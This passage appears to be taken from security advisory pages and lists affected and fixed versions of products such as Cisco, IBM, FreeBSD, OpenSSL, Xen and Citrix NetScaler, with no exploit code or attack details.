IBM Cognos Insight 10.2
IBM Business Process Manager Standard 8.5.6
IBM Business Process Manager Standard 8.5.5
IBM Business Process Manager Standard 8.5.7
IBM Business Process Manager Express 8.5.6
IBM Business Process Manager Express 8.5.5
IBM Business Process Manager Express 8.5.7
IBM Aix 7.2
IBM AIX 7.1
IBM AIX 6.1
IBM AIX 5.3
Gentoo Linux
FreeBSD Freebsd 9.3-RELEASE-p9
FreeBSD FreeBSD 9.3-RELEASE-p6
FreeBSD FreeBSD 9.3-RELEASE-p5
FreeBSD Freebsd 9.3-RELEASE-p35
FreeBSD Freebsd 9.3-RELEASE-p34
FreeBSD Freebsd 9.3-RELEASE-p33
FreeBSD Freebsd 9.3-RELEASE-p31
FreeBSD FreeBSD 9.3-RELEASE-p3
FreeBSD Freebsd 9.3-RELEASE-p29
FreeBSD Freebsd 9.3-RELEASE-p25
FreeBSD Freebsd 9.3-RELEASE-p24
FreeBSD Freebsd 9.3-RELEASE-p22
FreeBSD Freebsd 9.3-RELEASE-p21
FreeBSD FreeBSD 9.3-RELEASE-p2
FreeBSD Freebsd 9.3-RELEASE-p13
FreeBSD Freebsd 9.3-RELEASE-p10
FreeBSD FreeBSD 9.3-RELEASE-p1
FreeBSD FreeBSD 9.3
FreeBSD Freebsd 10.2-RELEASE-p9
FreeBSD Freebsd 10.2-RELEASE-p8
FreeBSD Freebsd 10.2-RELEASE-p6
FreeBSD Freebsd 10.2-RELEASE-p11
FreeBSD Freebsd 10.2-RELEASE-p10
FreeBSD Freebsd 10.2
FreeBSD Freebsd 10.1-RELEASE-p9
FreeBSD Freebsd 10.1-RELEASE-p6
FreeBSD Freebsd 10.1-RELEASE-p5
FreeBSD Freebsd 10.1-RELEASE-p28
FreeBSD Freebsd 10.1-RELEASE-p27
FreeBSD Freebsd 10.1-RELEASE-p26
FreeBSD Freebsd 10.1-RELEASE-p25
FreeBSD Freebsd 10.1-RELEASE-p23
FreeBSD Freebsd 10.1-RELEASE-p19
FreeBSD Freebsd 10.1-RELEASE-p17
FreeBSD Freebsd 10.1-RELEASE-p16
FreeBSD FreeBSD 10.1-RELEASE-p1
FreeBSD FreeBSD 10.1
FreeBSD FreeBSD 10.0
Extremenetworks Wireless AP 3965 10.1.1
Extremenetworks Wireless AP 3935 10.1.1
Extremenetworks Wireless AP 3865 10.1.1
Extremenetworks Wireless AP 3825 10.1.1
Extremenetworks Wireless AP 3805 10.1.1
Extremenetworks Wireless AP 3801 10.1.1
Extremenetworks Wireless AP 3715 10.1.1
Extremenetworks ExtremeXOS 0
Cisco WebEx Messenger Service 0
Cisco WebEx Meetings Server 2.5
Cisco WebEx Meetings Server 2.0
Cisco WebEx Meetings Server 1.5.1.6
Cisco WebEx Meetings Server 1.5.1.131
Cisco WebEx Meetings Server 1.5
Cisco WebEx Meetings Server 1.1
Cisco WebEx Meetings Server 1.0
Cisco Videoscape Control Suite Foundation 0
Cisco Unity Connection (UC) 0
Cisco Unified Intelligent Contact Management Enterprise 0
Cisco Unified Contact Center Express 0
Cisco Unified Contact Center Enterprise 0
Cisco Unified Communications Manager Session Management Edition (SME) 0
Cisco Unified Communications Manager (UCM) 0
Cisco Unified Attendant Console Standard 0
Cisco Unified Attendant Console Premium Edition 0
Cisco Unified Attendant Console Enterprise Edition 0
Cisco Unified Attendant Console Department Edition 0
Cisco Unified Attendant Console Business Edition 0
Cisco Unified Attendant Console Advanced 0
Cisco Unified 8945 IP Phone 0
Cisco TelePresence Video Communication Server (VCS) 0
Cisco TelePresence TX 9000 Series 0
Cisco TelePresence System 500-37 0
Cisco TelePresence System 500-32 0
Cisco TelePresence System 3000 Series 0
Cisco TelePresence System 1300 0
Cisco TelePresence System 1100 0
Cisco TelePresence System 1000 0
Cisco TelePresence Server on Virtual Machine 0
Cisco TelePresence Server on Multiparty Media 320 0
Cisco TelePresence Server on Multiparty Media 310 0
Cisco TelePresence Server 8710 7010
Cisco TelePresence Conductor 0
Cisco TelePresence 1310 0
Cisco Registered Envelope Service (CRES) 0
Cisco Proactive Network Operations Center 0
Cisco Prime Performance Manager 0
Cisco Prime Optical for SPs 0
Cisco Prime License Manager 0
Cisco Prime Collaboration Provisioning 0
Cisco Prime Collaboration Deployment 0
Cisco ONS 15454 Series Multiservice Provisioning Platforms 0
Cisco NX-OS Nexus 9000 0
Cisco NX-OS Nexus 5000 0
Cisco Nexus 7000 0
Cisco Nexus 6000 0
Cisco Nexus 3X00 0
Cisco Nexus 3000 0
Cisco Mobility Services Engine 0
Cisco MediaSense 0
Cisco MDS 9000 Series Multilayer Switches 0
Cisco Jabber for Windows 0
Cisco Intrusion Prevention System Solutions (IPS) 0
Cisco IM and Presence Service (CUPS) 0
Cisco Expressway series 0
Cisco Emergency Responder
Cisco Email Security Appliance 0
Cisco Edge 300 Digital Media Player 0
Cisco Computer Telephony Integration Object Server (CTIOS) 0
Cisco Cloupia Unified Infrastructure Controller 0
Cisco Cisco Unified Computing System B-Series (Blade) Servers 0
Cisco Cisco Unified 7800 series IP Phones 0
Cisco ASA Next-Generation Firewall Services 0
Cisco AnyRes Live (CAL) 0
Cisco Agent Desktop
Cisco 8800 Series IP Phones 0
CentOS CentOS 7
CentOS CentOS 6
CentOS CentOS 5
Not Vulnerable: Oracle VM VirtualBox 5.0.16
Oracle Solaris 11.3 SRU 6.5
OpenSSL Project OpenSSL 1.0.2g
OpenSSL Project OpenSSL 1.0.2f
OpenSSL Project OpenSSL 1.0.1s
OpenSSL Project OpenSSL 1.0.1r
IBM Tivoli Provisioning Manager for OS Deployment 7.1.1.20 build 280.6
IBM Tivoli Provisioning Manager for OS Deployment 5.1.1 build 051.07
IBM Tivoli Provisioning Manager for Images 7.1.1.20 build 280.6
IBM SmartCloud Entry 3.2 Appliance fixpac
IBM SmartCloud Entry 3.1 Appliance fixpac
IBM SDK for Node.js 1.2.0.10
IBM SDK for Node.js 1.1.0.20
IBM Real-time Compression Appliance 4.1.2.17
IBM PureApplication System 2.2.1
IBM PureApplication System 2.1.2.2
IBM PureApplication System 2.0.0.1 IF 8
IBM PowerKVM 2.1.1 SP3
IBM PowerKVM 2.1.1 Build 65.7
IBM PowerKVM 3.1 SP1
IBM DataPower Gateways 7.2.0.6
IBM DataPower Gateways 7.1.0.10
IBM DataPower Gateways 7.0.0.13
IBM Cognos Insight 10.2.2 FP 6
IBM Cognos Insight 10.2.1 FP 2 IF 6
IBM Cognos Insight 10.2 FP 1 IF 6
FreeBSD FreeBSD 9.3-STABLE
FreeBSD Freebsd 9.3-RELEASE-p36
FreeBSD Freebsd 10.2-STABLE
FreeBSD Freebsd 10.2-RELEASE-p12
FreeBSD Freebsd 10.1-RELEASE-p29
Extremenetworks Wireless AP 3965 10.11.1
Extremenetworks Wireless AP 3965 10.1.4
Extremenetworks Wireless AP 3935 10.11.1
Extremenetworks Wireless AP 3935 10.1.4
Extremenetworks Wireless AP 3865 10.11.1
Extremenetworks Wireless AP 3865 10.1.4
Extremenetworks Wireless AP 3825 10.11.1
Extremenetworks Wireless AP 3825 10.1.4
Extremenetworks Wireless AP 3805 10.11.1
Extremenetworks Wireless AP 3805 10.1.4
Extremenetworks Wireless AP 3801 10.11.1
Extremenetworks Wireless AP 3801 10.1.4
Extremenetworks Wireless AP 3715 10.11.1
Extremenetworks Wireless AP 3715 10.1.4



Vulnerable: Xen Xen 4.0.4
Xen Xen 4.0.1
Xen Xen 4.5.0
Xen Xen 4.4.1
Xen Xen 4.4.0
Xen Xen 4.4
Xen Xen 4.3.1
Xen Xen 4.3.0
Xen Xen 4.3
Xen Xen 4.2.3
Xen Xen 4.2.2
Xen Xen 4.2.1
Xen Xen 4.2.0
Xen Xen 4.2
Xen Xen 4.1.6.1
Xen Xen 4.1.5
Xen Xen 4.1.4
Xen Xen 4.1.3
Xen Xen 4.1.2
Xen Xen 4.1.1
Xen Xen 4.1.0
Xen Xen 4.1
Xen Xen 4.0.3
Xen Xen 4.0.2
Xen Xen 4.0.0
Xen Xen 4.0
Xen Xen 3.4.4
Xen Xen 3.4.3
Xen Xen 3.4.2
Xen Xen 3.4.1
Xen Xen 3.4.0
Xen Xen 3.3.2
Xen Xen 3.3.1
Xen Xen 3.3.0
Xen Xen 3.3
Ubuntu Ubuntu Linux 15.04
Ubuntu Ubuntu Linux 14.10
Ubuntu Ubuntu Linux 14.04 LTS
Ubuntu Ubuntu Linux 12.04 LTS i386
Ubuntu Ubuntu Linux 12.04 LTS amd64
SuSE SUSE Linux Enterprise Software Development Kit 11 SP3
+ Linux kernel 2.6.5
SuSE SUSE Linux Enterprise Server 11 SP3
+ Linux kernel 2.6.5
SuSE SUSE Linux Enterprise Server 11 SP1 LTSS
+ Linux kernel 2.6.5
+ Linux kernel 2.6.5
SuSE Linux Enterprise Server 11 SP2 LTSS
SuSE Linux Enterprise Desktop 11 SP3
S.u.S.E. openSUSE 13.2
S.u.S.E. openSUSE 13.1
Gentoo Linux
Debian Linux 6.0 sparc
Debian Linux 6.0 s/390
Debian Linux 6.0 powerpc
Debian Linux 6.0 mips
Debian Linux 6.0 ia-64
Debian Linux 6.0 ia-32
Debian Linux 6.0 arm
Debian Linux 6.0 amd64
Citrix NetScaler SDX 10.5e
Citrix NetScaler SDX 10.5
Citrix NetScaler SDX 10.1
Citrix NetScaler Gateway 10.5.e
Citrix NetScaler Gateway 10.5
Citrix NetScaler Gateway 10.1
Citrix NetScaler ADC 10.5.e
Citrix NetScaler ADC 10.5
Citrix NetScaler ADC 10.1

